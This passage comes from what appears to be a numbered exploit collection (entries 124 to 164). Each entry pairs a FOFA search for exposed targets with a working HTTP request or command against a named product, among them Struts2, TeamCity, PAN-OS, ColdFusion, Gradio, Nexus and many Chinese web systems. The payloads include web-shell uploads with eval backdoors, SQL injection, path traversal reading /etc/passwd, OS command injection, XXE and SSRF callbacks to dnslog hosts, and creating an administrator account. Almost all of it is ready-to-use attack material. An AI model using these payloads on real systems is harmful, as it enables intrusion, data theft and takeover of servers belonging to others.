User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the admin console directly; system commands can then be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin console address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (福建科立讯) communications command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (福建科立讯) communications command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (福建科立讯) communications command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (福建科立讯) communications command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun (福建科立讯) communications command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass via template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier (天维尔) fire rescue combat dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) PACS WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
